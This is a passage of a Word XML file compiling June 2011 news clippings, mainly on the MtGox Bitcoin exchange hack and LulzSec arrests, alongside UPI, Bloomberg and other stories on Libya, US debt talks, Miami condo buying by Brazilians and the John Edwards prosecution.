that creates direct access to databases and files] which means access to the site's funds were in the hands of the malicious hacker. As such, until we see evidence to the contrary, for security reasons we are assuming that MTGox has none of its clients'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senior coders in the Bitcoin community claim to have been offered the full database of MtGox users days before the hack was carried out. Though they had not verified whether the database was genuine, it came from the same intermediary who has been testing interest in selling or distributing details from the Sega Pass hack.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LulzSec, the hacker group whose alleged member Ryan Cleary was arrested in Essex on Tuesday, denied responsibility for the Sega Pass hack, as did several members of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spate of hacks denied by both groups Б─" neither of which usually seeks to hide from the limelight Б─" raises the possibility of a third, as yet unnamed, group of hackers carrying out the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and Anonymous members stand to lose a significant amount of money if Bitcoins fail. Several members of both groups Б─" speaking directly and through intermediaries Б─" claim to know of others using thousands of hacked computers to generate Bitcoins.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Observer 2011.06.23 02:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.guardian.co.uk/technology/2011/jun/22/lulzsec-rogue-suspected-of-bitcoin-hack</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UPI NewsTrack TopNews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GOP mulls two War Powers resolutions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June 22 (UPI) - U.S. House Republican leaders drafted two resolutions on Libya - one ending U.S. involvement and the other authorizing U.S. participation, aides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measures, which could be voted on this week, are in response to President Obama's determination that he doesn't need congressional consent as provided for in the War Powers Act for the Libyan mission supporting NATO, Politico reported Tuesday.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bipartisan group of senators, led by John Kerry, D-Mass., and John McCain, R-Ariz., is drafting a use-of-force authorization, similar to one House option, that would be a congressional sign-off for continued intervention in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Rank-and-file congressional Republicans and Democrats are increasingly voicing opposition not only to the mission but also Obama's contention that U.S. involvement - including airstrikes against Libyan military targets - doesn't require congressional consent.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isn't clear whether either resolution could pass the House, Politico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Speaker John Boehner of Ohio said in a statement Tuesday the House Republican Conference would discuss Libya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clear that the Obama administration's claim that targeted bombings, missile strikes and other military actions in Libya do not constitute 'hostilities' under the War Powers Resolution is not credible," the statement said, noting that "even his administration's attorneys from the Office of Legal Counsel and the Department of Defense recognize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Ohio Republican also took Obama to task for failing to make a compelling case for U.S. involvement in Libyan rebels' efforts to overthrow leader Moammar Gadhafi.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commander in chief believes that intervention in Libya is important for our national security, he has a responsibility to make a case for it - clearly and publicly - and seek authorization," Boehner said. "In the three months since military action in Libya began, none of this has occurred. The American people deserve to have their voice heard in this debate, and Congress has a responsibility to hold the White House accountable."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said no one wants to damage the NATO alliance's conducting the airstrikes, but he maintains that the sustained use of military troops in Libya requires Congress' approval under the Constitution, Roll Call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House also will take up the Pentagon appropriations bill this week, giving members another forum to debate the Libya issue. Rep. Dennis Kucinich, D-Ohio, an outspoken critic of U.S. involvement in Libya, has indicated he plans to introduce an amendment that would strip funding for the U.S. role in the mission.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Arab League chief questions Libya tactics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BRUSSELS, June 22 (UPI) - The Arab League leader who played a central role in securing Arab support for NATO airstrikes in Libya said he is having second thoughts about the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Veteran Egyptian diplomat Amr Moussa said the bombing mission may not be working and a political solution should be found, the British newspaper The Guardian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Moussa told the newspaper in an interview in Brussels that he no longer believes the NATO mission will produce a breakthrough and sweep strongman Moammar Gadhafi from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can't have a decisive ending," Moussa said. "Now is the time to do whatever we can to reach a political solution."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first step is "a genuine ceasefire under international supervision."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the ceasefire, Gadhafi would remain in office. Then there would be a move to a transitional period to reach an understanding about the future of Libya," Moussa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Moussa was president of the Arab League until three weeks ago and remains its caretaker chief until his successor takes over in September.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currently a frontrunner to become president of Egypt.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Taliban kidnaps child for suicide bombing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KARACHI, Pakistan, June 22 (UPI) - A nine-year-old Pakistani schoolgirl said she narrowly escaped becoming a suicide bomber for the Taliban.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girl, identified only as "Sohana," told a news conference she was kidnapped on her way to school in Peshawar by two men and two women, The Christian Science Monitor reported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Sohana said the Taliban militants drove her to a large town bordering Afghanistan and instructed her to attack the Darra Islam checkpoint.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third-grader managed to escape her captors while they were fitting her in a suicide vest.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Farzana Bari, a leading human rights activist, said Sohana's experience validates fears the Taliban are increasingly using children as weapons.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believe the Taliban are becoming desperate," she said. "It is worrisome that now they (the Taliban) want to destroy the young generation and use these innocent kids as their soldiers in the name of holy war."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budget chief nixes debt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June 22 (UPI) - The chairman of the U.S. Senate Budget Committee has indicated his displeasure with a package of more than $2 trillion in debt-reduction by 2021.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Democratic Sen. Kent Conrad of North Dakota said a greater amount is needed to stabilize borrowing, re-energize the economy and avert the threat of a debt crisis, The Washington Post reported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$2 trillion package sounds big," Conrad said, "but I think most serious observers would tell you that it takes a package of at least $4 trillion to fundamentally change the trajectory we're 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$2 trillion over 10 years will not do the job with a debt of nearly $15 trillion that is headed to $25 trillion.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Bipartisan negotiators led by Vice President Joe Biden are working on drafting a debt-reduction package that will persuade reluctant lawmakers to raise the legal limit on government borrowing.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additional borrowing authority, the government could default on its obligations beginning Aug. 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Republicans suggested a scaled-back, short-term debt deal but the move was rejected by House Majority Leader Eric Cantor, Politico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see how multiple votes on a debt ceiling increase can help get us to where we want to go," Cantor said Tuesday. "It is my preference that we do this thing one time."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says British suspect not leader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June 22 (UPI) - The computer hacking coalition Lulz Security Wednesday denied that a teenager arrested in Britain recently had a major role in the group.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known as LulzSec, also claimed responsibility for bringing down the Brazilian government's Web site, posting on its Twitter page, "Tango down," using military jargon to say it interrupted service to a Web site, CNN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Brazilian government and presidency Web sites were failing to load Wednesday morning, hours after the group said it attacked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also said Ryan Clearly, whom British media named as the 19-year-old hacker arrested outside of London Monday, was not a key player in the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"Ryan Cleary is not part of LulzSec; we house one of our many legitimate chatrooms on his IRC server, but that's it," the group posted on its Twitter page. "Clearly the UK police are so desperate to catch us that they've gone and arrested someone who is, at best, mildly associated with us. Lame."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suspect was custody but had not been charged, London's Metropolitan Police told CNN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said they arrested Cleary on suspicion of mounting cyberattacks on the CIA and the U.S. Senate Web sites, The Daily Telegraph reported. He could be extradited to United States, where computer hacking carries a prison term of up to 10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police spokesman said the teen's computers will be examined for activities related to hacks against Britain's Serious Organized Crime Agency, the CIA and Sony. The suspect's computer will also be examined for links to LulzSec, another police spokesman told CNN.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link has not been established yet as it [the investigation] is still early," the spokesman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authorities said they suspect a rogue member of LulzSec was responsible for a weekend hack in which $9 million worth of online currency was stolen, The Guardian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was against a currency exchange called MtGox, which provides a method for swapping bitcoins - an untraceable, cryptographically created online-only currency - for real American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officials said its site was not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has denied involvement in the bitcoin hack, although it has taken credit for breaching the CIA and PBS Web sites. Unclear is whether LulzSec members played a role in the Sony PlayStation Network breach, although they have posted what they said is proprietary information from Sony operations.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Michelle Obama tells youth, 'Yes we can'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SOWETO, South Africa, June 22 (UPI) - U.S. first lady Michelle Obama, speaking at a church key in the fight against apartheid, urged South African youth to work to end AIDS and sexual violence.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my husband [President Barack Obama] has said, Africa is a fundamental part of our interconnected world. And when it comes to the defining challenges of our times - creating jobs in our global economy, promoting democracy and development, confronting climate change, extremism, poverty and disease - for all this, the world is looking to Africa as a vital partner," Obama said during an address before a packed Regina Mondi Church in Soweto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singled out 76 young women from across Africa in the audience who are attending the first-ever Young African Women Leaders Forum, sponsored by the White House, State Department and other U.S. entities.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church at the heart of the Soweto uprising and ensuing anti- apartheid protests 35 years ago, she asked the estimated 2,000 listeners what they would leave future generations after young people years ago endured beatings, jail and death for freedom.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because of them that so many of these young women leaders can now pursue their dreams," she said. "That is the legacy of the independence generation, the freedom generation. And all of you - the young people of this continent - you are the heirs of that blood, sweat, sacrifice, and love."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today's challenges may be less dramatic, "the injustices at hand are no less glaring, the human suffering no less acute,"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be the generation that makes the discoveries and builds the industries that will transform our economies. You can be the generation that brings opportunity and prosperity to forgotten corners of the world and banishes hunger from this continent forever," Obama said. "You can be the generation that ends HIV/AIDS in our time; the generation that fights not just the disease, but the stigma of the disease, the generation that teaches the world that HIV is fully preventable, and treatable, and should never be a source of shame."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youth can be the generation that holds its leaders accountable for open, honest government, and that advocates the freedom for people to speak out, worship openly or "love whomever they choose,"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be the generation to ensure that women are no longer second-class citizens, that girls take their rightful places in our schools," Obama said to applause. "You can be the generation that stands up and says that violence against women in any form ... isn't just a women's rights violation. It's a human rights violation. And it has no place in any society."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used her husband's 2008 campaign slogan to close.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anyone of you ever doubts that you can build that future, if anyone ever tells you that you shouldn't or you can't," she said, "then I want you to say with one voice - the voice of a generation - you tell them, 'Yes, we can.'"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>United Press International 2011.06.22 19:29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.upi.com/Top_News/US/2011/06/22/UPI-NewsTrack-TopNews/UPI-14401308758400/print/</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says British suspect not leader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June 22 (UPI) - The computer hacking coalition Lulz Security Wednesday denied that a teenager arrested in Britain recently had a major role in the group.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known as LulzSec, also claimed responsibility for bringing down the Brazilian government's Web site, posting on its Twitter page, "Tango down," using military jargon to say it interrupted service to a Web site, CNN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Brazilian government and presidency Web sites were failing to load Wednesday morning, hours after the group said it attacked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also said Ryan Clearly, whom British media named as the 19-year-old hacker arrested outside of London Monday, was not a key player in the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"Ryan Cleary is not part of LulzSec; we house one of our many legitimate chatrooms on his IRC server, but that's it," the group posted on its Twitter page. "Clearly the UK police are so desperate to catch us that they've gone and arrested someone who is, at best, mildly associated with us. Lame."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suspect was custody but had not been charged, London's Metropolitan Police told CNN Wednesday.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said they arrested Cleary on suspicion of mounting cyberattacks on the CIA and the U.S. Senate Web sites, The Daily Telegraph reported. He could be extradited to United States, where computer hacking carries a prison term of up to 10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police spokesman said the teen's computers will be examined for activities related to hacks against Britain's Serious Organized Crime Agency, the CIA and Sony. The suspect's computer will also be examined for links to LulzSec, another police spokesman told CNN.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link has not been established yet as it [the investigation] is still early," the spokesman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authorities said they suspect a rogue member of LulzSec was responsible for a weekend hack in which $9 million worth of online currency was stolen, The Guardian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was against a currency exchange called MtGox, which provides a method for swapping bitcoins - an untraceable, cryptographically created online-only currency - for real American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officials said its site was not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has denied involvement in the bitcoin hack, although it has taken credit for breaching the CIA and PBS Web sites. Unclear is whether LulzSec members played a role in the Sony PlayStation Network breach, although they have posted what they said is proprietary information from Sony operations.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the story "The Lulz Boat hacking spree" on Storify]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>United Press International 2011.06.22 19:29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.upi.com/Top_News/World-News/2011/06/22/LulzSec-says-British-suspect-not-leader/UPI-75971308757467/print/</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EFF backs away from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Mt Gox outage drags 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Richard Chirgwin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Electronic Frontiers Foundation in the US has decided it will no longer accept donations via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not itself a member of Bitcoin, the organization had been accepting donations via the currency through an account set up by an anonymous third party. However, only coincidentally following the Bitcoin Mt Gox hack-and- crash, the EFF has reversed its stance.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cited questions about the legal standing of the crypto-currency with relation to Б─°securities law, the Stamp Payments Act, tax evasion, consumer protection and money launderingБ─². Further, it was concerned that its acceptance of Bitcoins Б─" through an account it did not establish Б─" was being touted as EFF endorsement.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meanwhile, has blamed its security woes on an unnamed third party, stating that Б─°someoneБ─² who performs audits on its system, and had read- only access to their database, had their system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re-opening, well beyond Mt GoxБ─(tm)s original schedule, will now not happen until after users have been given the chance to recover their accounts to pre-attack states.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holders will have to provide proofs like transaction records or (this is a peach) Б─°notarized documentationБ─². The exchange wonБ─(tm)t open at least until 24 hours after Mt Gox has decided users have had long enough to recover their accounts.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 has also posted to the Bitcoin forums claiming that the attack on its systems is a Б─°force majureБ─² event, giving it the right to reverse the trades. The Mt Gox site is currently dropping connections, so El Reg canБ─(tm)t tell you what the organisationБ─(tm)s terms and conditions have to say about force majure.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2011.06.22 03:35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.theregister.co.uk/2011/06/22/eff_drops_bitcoin/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 Is it dying?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Gomez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were slowly increasing in value. Then some issues came along and they might kill the current version of Bitcoin before it catches on with the general public.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ideology behind Bitcoin is revolutionary. Theoretically, if it were to be accepted by a large audience it would take power away from governments and central banks and put it in the hands of the people. The idea could change the way the world works.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dreamers will have to keep on dreaming for now because multiple issues have come along and threatened the viability of Bitcoin as a digital alternative to government controlled fiat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there were the malware attacks on Bitcoin users where malware authors used Trojan searches to find the user's wallet.dat file. This file contains information about the user's Bitcoin balance, and the malware attacks were finding people's Bitcoin balances and uploading it to the attacker.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user lost 25,000 Bitcoins in a hacking attack which was worth around $500,000 at the time of the theft.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value of the Bitcoin crashed because its largest exchange, Mt. Gox, was compromised. This caused the value of the Bitcoin to fall from about $17.5 to just a few cents. Bitcoin has no central authority, but Mt. Gox is important in the world of Bitcoin because they allow people to convert bitcoins to US dollars and back.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Gox's owner Mark Karpeles explained to the New Scientist that, the site itself was not hacked, but someone gained access to a computer used by one of Mt. Gox's auditors and stole a read-only copy of its database containing details of over 60,000 accounts.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thief also tried to sell off all of the Bitcoins in a large account but was stopped by the $1,000 per day limit. This sale caused people to lose faith in the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third development is possibly the most troubling.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Gavin Andresen, Bitcoin's main developer has become a spokesperson of sorts for the currency. He was just down in Washington D.C. at the CIA presenting Bitcoin to a digital currency conference. He's also been meeting with his Congressmen to teach them about the system, and why the company should be seen as a way to cut transaction costs, instead of an evil organization responsible for money laundering and drug deals.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then there's Donald Norman, the co-founder of Bitcoin Consultancy. He advocates for Bitcoin's regulation, according to CNBC: "Norman is pushing to bring Bitcoin away from its roots and closer to a traditional currency - he is reaching out to regulators, looking to get legislation to oversee the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to wonder, why are they taking it upon themselves to do this? Don't they realize that the whole reason that Bitcoin is appealing is because it allows them to buy and sell online anonymously? Getting the CIA and legislators involved will strip Bitcoin of that advantage. Do they really think that the government will allow transactions to remain anonymous if they get involved?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Getting the government involved in regulating Bitcoin will pretty much make it useless.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supporters might want to start thinking about using its open source nature to being building a Bitcoin 2.0. This initial version will probably be corrupted by the very forces its creators were trying to keep it away from.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about: Opinion Features banking economic espionage money</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>TG Daily 2011.06.21 23:29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.tgdaily.com/opinion-features/56768-bitcoin-is-it-dying</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Brazilians Buy Miami Condos at a Discount as Real Climbs 45%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2011, 1:12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MetLife Pushes Reverse Mortgages as Wells Fargo Retreats BofA Said to Plan Sale of China Construction Bank Stake PNC to Buy RBCБ─(tm)s U.S. Bank, Card Assets for $3.62 Billion Emerging-Market Stocks Fall to Three-Month Low; Lira Weakens PNC Said to Pay $3.45 Billion for RBC U.S. Retail Banking Unit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Gittelsohn and Jose Sergio Osse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Miami condo sales data in third paragraph, international purchases in fourth.)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(Bloomberg) - Frederico Azevedo went to Florida looking for a second home. He left with three, paying $300,000 and $500,000 for condos in two Miami towers, and $1 million for a unit at the Trump International resort in nearby Sunny Isles.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bought one to use as a vacation home and the other two as investments," Azevedo, 39, president of Construtora Altana Ltda, a housing-development company, said in a telephone interview from his office in Sao Paulo. "It's actually very cheap in Miami compared to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Surging real estate prices in Brazil and the currency's 45 percent gain against the U.S. dollar since 2008 are sending Brazilians to South Florida in search of bargain vacation homes and property investments. That's helping bolster Miami's condo market, with total sales increasing 79 percent in the first five months of 2011 from a year earlier, according to data from the Florida Association of Realtors released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Miami area, Brazilians bought 9 percent of homes and apartments sold to international buyers in the 12 months through March 2010, behind only Canadians and Venezuelans, according to the Miami Association of Realtors. Since then, "anecdotal evidence certainly points to a significant increase," said Lynda Fernandez, a spokeswoman for the group. In May, international clients bought about 60 percent of existing houses and condos and 90 percent of newly built homes, the association reported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Million-Dollar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many as half of the downtown Miami condos that have been sold to foreigners for more than $500,000 since January were purchased by Brazilians, said Craig Studnicky, president of International Sales Group LLC, an Aventura, Florida, property- marketing firm. Buyers from Brazil also accounted for about half of sales of more than $1 million in Miami Beach.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Demand from Brazilians is "growing geometrically," he said. "Next year, it's clearly going to be the dominating force."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Brazilian real's 45 percent increase against the dollar from the end of 2008 through yesterday is the best performance among 25 emerging-market currencies tracked by Bloomberg. The nation's economy, Latin America's biggest, grew 4.2 percent in the year through March 31, compared with U.S. expansion of 2.3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Pricier Than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fastest economic growth in two decades last year and accelerating inflation made Sao Paulo, Rio de Janeiro and Brasilia more expensive than any U.S. city, according to a survey by ECA International, a London-based human-resources company. Brazil's home prices rose an estimated 25 percent during the 12 months through May, with prices up 44 percent in Rio, Adrian E. Huerta, a JPMorgan Chase &amp; Co. analyst in New York, and Marcelo Motta and Marina Mansur in Sao Paulo, wrote in a June 15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these price increases sustainable?" the analysts wrote. "Well, we are not seeing any deceleration in home price increases yet."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housing prices have fallen to 2003 levels as foreclosures depress values and unemployment hovers around 9 percent. Miami-area homes are selling for 51 percent less than their December 2006 peak, according to the S&amp;P/Case-Shiller index. Only Las Vegas and Phoenix had bigger price declines.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Rio's exclusive Leblon enclave, near the city's Ipanema district of bossa nova fame, apartments sell for an average $1,058 a square foot ($11,388 a square meter), according to Sindicato da Habitacao do Rio de Janeiro, or Secovi, the city's real estate association. In Miami's South Beach, the average condominium price was $354 a square foot during this year's first quarter, said Condo Vultures LLC, a Bal Harbour, Florida, real estate brokerage and consulting firm.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Way Around'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years ago, it was the other way around," Studnicky said in a phone interview. "Miami was trading for $500 to $1,000 a foot. Rio was trading for $300 to $500. It has absolutely switched."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Miami real estate agents are learning Portunol, a mix of Portuguese and Spanish that Brazilians can understand, said Peter Zalewski, principal of Condo Vultures. He lost three employees who spoke fluent Portuguese to competitors.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agents stole them because they wanted to tap into the market," Zalewski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built from the ground up and converted apartments to create 49,000 new condominiums east of Interstate 95 in Florida's Miami-Dade, Broward and Palm Beach counties from 2003 to 2008, riding a speculative bubble that popped when credit dried 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Fewer for Sale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condos and townhouses available for sale fell to 27,700 as of June 13 from 60,900 in November 2008, after the collapse of credit markets, according to Condo Vultures.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are preparing to build again with their eyes on Latin American buyers. Studnicky's company announced a joint venture, Related ISG LLC, on June 9 to market new condo developments with Miami-based Related Group of Florida, the state's largest condo builder.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which was founded by Jorge M. Perez and wrote off $1 billion in losses in 2008, plans to use pre-construction deposits from Latin American buyers, who are accustomed to 50 percent down payments, to finance six projects with 1,500 units, Studnicky said. Building is expected to cost $600 million to $800 million and begin by 2013,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Integra Development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 may take a few years for U.S. lenders to finance new construction in Miami, Brazilian buyers are taking advantage of today's opportunities, said Paulo Tavares de Melo, director of real estate for Integra Solutions LLC, a fund for high-net- worth Brazilians to invest in Florida property. Integra paid $12 million in April to develop 3 acres (1.2 hectares) in downtown Miami with permits for as many as 920 apartments and 100,000 square feet (9,300 square meters) of office and retail space.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is there's a lot of money in Brazil," Melo, 37, whose family made its fortune in Brazil's sugar cane and ethanol industries, said in a telephone interview from Miami, where he has lived since 2001. "There's more interest here than New York, because of the prices, and the perception that prices have already fallen so much."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Coelho da Fonseca Empreendimentos Imobiliarios Ltda, a Sao Paulo-based real estate brokerage, created an international division in May, mainly to assist Brazilians buying property in the U.S., especially Miami.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‘Drawn to Miami'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"Brazilians are drawn to Miami by the opportunity to buy property which they can rent the next day, generating income," Gabriela Duva, director of Coelho da Fonseca's new division, said in a telephone interview from New York. "Even those buying for leisure also plan to rent while not using their properties."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Brazil's government has changed tax rules three times since March 29 to slow the real's appreciation, which has widened its current account deficit and made U.S. properties less expensive. Brazilians' enthusiasm for real estate in the U.S. may cool if the currency or property values head in a different direction, said Jose Augusto Pereira Nunes, owner of Miami-based Algebra Realty.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"Brazilians today have the tide and the winds in their favor, the exchange rate being the tide and prices here being the winds," Nunes, who moved to Florida from Brazil 25 years ago, said in a telephone interview. "If one of these falters, demand will also falter."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Falling Property Values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real estate values also may have further to fall, said Robert Shiller, a Yale University economics professor and co- founder of the S&amp;P/Case- Shiller indexes. That suggests that now isn't the best time to buy.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10 to 25 percent further decline in real home prices over the next, you know, five years, would not surprise me at all," Shiller said at a June 9 conference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Miami's decline in property values has contributed to a projected 2012 municipal deficit of at least $40 million, forcing the city to consider employee pay cuts, layoffs and furloughs, Mayor Tomas Regalado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nine to 12 months, Brazilians bought as many as a third of the condos sold by Fortune International, said Edgardo Defortuna, chief executive officer of the Miami-based real estate development and marketing company. About 75 percent of purchases at buildings he represents, including the Icon Brickell in Miami, the Jade Ocean in Sunny Isles and the Trump Hollywood in Hollywood, Florida, are all-cash deals to buyers from outside the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a Profit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many Latin Americans invest in Florida as a haven from social and economic uncertainty, Brazilians come to enjoy themselves and, perhaps, make a profit, said Defortuna, a native of Argentina.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 talk to Brazilian people, they are buying for the right reasons," he said in a phone interview. "It's not only because they have money now, but because they think they're going to continue to make money next year and the year after."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 International is marketing about 1,000 condos and will add 350 more by September, Defortuna said. He is working with brokers in Sao Paulo, Brazil's largest city, and Brasilia, the capital. To make those clients feel more at home, Defortuna offers a line of condos with furnishings from Artefacto, a Sao Paulo-based furniture maker with two Florida stores.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"Everybody who makes a little money buys in Florida," Paulo Bacchi, co- owner of Artefacto, said in a telephone interview from Miami. "Some came to buy a vacation home. Some are buying 10 units for an investment. They're buying because the only way prices can go is up. They're betting on Florida."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 to Shopping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beach proximity, Brazilians want condos near the shopping malls of Aventura and Bal Harbour, where they buy watches, designer clothing and perfumes at prices that are a relative bargain, Bacchi said. They also feel more free to flaunt their wealth in Florida because it has a lower crime rate than most Brazilian cities,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come here and enjoy their wealth, enjoy life without the issue of being robbed," Bacchi said. "The basic worry in Miami is, don't forget to use your sunscreen."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Brazilians overtook Canadians as the foreign group spending the most tourist dollars in Miami last year, according to the Greater Miami Convention &amp; Visitors Bureau. They spent an estimated $1.14 billion in the Miami-Dade area on hotels, restaurants, entertainment and shopping, compared with $840.9 million by Canadians, according to the bureau. That equates to $2,053 per Brazilian visitor, compared with $1,432 per Canadian.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Auto-Racing Sideline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Cristiano Piquet, 33, started selling homes in Miami in 2005 as a sideline to an auto-racing career. He now works with 50 brokers, catering mostly to buyers from his native Brazil. He likes to take clients in his four-seat Cessna seaplane, offering bird's-eye views of Miami's high-rise condos and beaches while making his sales pitch.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"Brazilians are buying prime real estate, especially on the water," Piquet, who races Porsche GT3 series cars, said in a telephone interview. "They pay $1 million for vacation homes, all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Piquet's clients is Azevedo, who said he plans to stay at his $1 million unit at the Trump International Beach Resort in Sunny Isles, 20 miles (32 kilometers) north of Miami, about four times a year, and rent out the two condos in Miami, at the Vizcayne and Icon Brickell towers. Miami, an eight-hour flight north of the equator from Sao Paulo, offers warm weather during Brazil's winter and an escape from its sweltering summers in Florida's cooler months,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the weather and the beach," Azevedo said. "It's one of the closest places you can fly from Sao Paulo outside of South America."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Direct Flights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Direct flights between Brazil and Miami International Airport have increased to 114 a week from 96 in 2009, said Greg Chin, spokesman for the Miami-Dade Aviation Department. AMR Corp.'s American Airlines flies from Miami to Rio, Sao Paolo, Recife, Brasilia and Belo Horizonte, Brazil. Tam SA, a Brazilian airline, links Miami with Rio, Sao Paulo, Brasilia, Belo Horizonte and Manaus.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Azevedo, whose company develops affordable housing in Brazil, bought his Florida condos with 50 percent cash down payments and financed the balance with 4.75 percent interest rate mortgages. Similar condos are selling today for 10 percent to 15 percent more than he paid in December, Azevedo said. He's not worried about losing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buy similar units in Brazil, you'd pay double the price and double the interest rates," he said. "So that's why it's such a good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Simone Baribeau in Miami. Editors: Daniel Taub, Christine Maurus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John Gittelsohn in New York at johngitt@bloomberg.net; Jose Sergio Osse in Sao Paulo at josse1@bloomberg.net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Kara Wetzel at kwetzel@bloomberg.net; Francisco Marcelino at mdeoliveira@bloomberg.net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Cigarette Pack Images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Capital Cushions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The Destruction of Economic Facts Krispy Kreme Wants to Be Good for You Haptics Adds New Dimensions to Touchscreens The War Over Chinese Stocks in North America The Real U.S. Fiscal Crisis Is Joblessness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Krispy Kreme Wants to Be Good for You God's MBAs: Why Mormon Missions Produce Leaders The Big Business of Synthetic Highs The Destruction of Economic Facts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Real U.S. Fiscal Crisis Is Joblessness Yelp's Online Reviewing Mafia The Destruction of Economic Facts Online Anonymity: Painful and Priceless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Buying a Business Buying a Foreclosed Home China Real Estate Advertising in a Recession Washington State Real Estate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21:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-21/brazilians-buy-miami-condos-at-a-discount-as-real-climbs-45-.html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John Edwards Should Face October Trial, Prosecutor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2011, 1:06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Grace Seeks Court Permission for Deal With Undisclosed Seller Wal-Mart, Barclays, Primary Global, JPMorgan in Court News Banks CanБ─(tm)t Block Theflyonthewall.com Reports, Court Rules House Republicans Draft Letter on Warren Mortgage-Talks Role Facebook, Primary Global, WaMu, Credit Suisse in Court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Peragine and Jef Feeley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prosecutor's comment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(Bloomberg) - John Edwards, the former U.S. presidential candidate accused of accepting illegal campaign contributions to hide an extramarital affair, should face an October criminal trial, a federal prosecutor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Edwards, who has pleaded not guilty to charges he used donations to conceal the relationship and child he had with filmmaker Rielle Hunter while running for president in 2008, should be able to review evidence gathered by prosecutors in time for an October trial, Assistant U.S. Attorney Robert J. Higdon told a federal judge today in Greensboro, North Carolina.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defense will have a good sense and picture of the trial with the material we're ready to release," Higdon told Judge Norwood Carlton Tilley Jr. Prosecutors are "confident we can proceed with the October date," he said. He said Edwards's legal team is seeking a January 2012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federal grand jury indicted Edwards this month on charges of accepting illegal campaign funds, conspiracy and making false statements. Edwards, who was in court today, is free on bond.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Edwards, a 58-year-old Democrat, was the target of a two- year probe into his handling of donations to his presidential campaign in 2007 and 2008. Prosecutors say he used the funds to pay Hunter's rent, medical visits and prenatal expenses as part of an effort to keep his relationship with her secret.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Wife's Death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Edwards publicly acknowledged the relationship with Hunter in August 2008. A former plaintiffs' lawyer from North Carolina, he served in the Senate from 1999 to 2005. Massachusetts Senator John Kerry tapped him to be his running mate in the 2004 presidential election.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Edwards, who ran against now-President Barack Obama for the nod to be the Democratic presidential candidate, withdrew from the race in January 2008. He later revealed his affair with Hunter after a newspaper reported that he had fathered the woman's daughter and claimed paternity of her child.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2009 book, Edwards's wife, Elizabeth Edwards, said her husband confessed the affair to her in the final days of 2006, after returning home from a tour announcing his second run for president. Elizabeth Edwards died in December after a six-year battle with breast cancer.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Election Act limits the amount individuals may contribute to candidates. The most an individual could contribute in the 2008 presidential primary was $2,300.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Edwards accepted about $725,000 from one person and more than $200,000 from another, according to the indictment.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‘Well-Known Individuals'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statement from Scott E. Thomas, a former chairman of the Federal Election Commission, identified the two donors as Rachel "Bunny" Mellon, a 100-year- old multimillionaire heiress, and Fred Baron, a Dallas-based trial lawyer who died in October 2008 at 61.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today's hearing, Higdon said prosecutors were 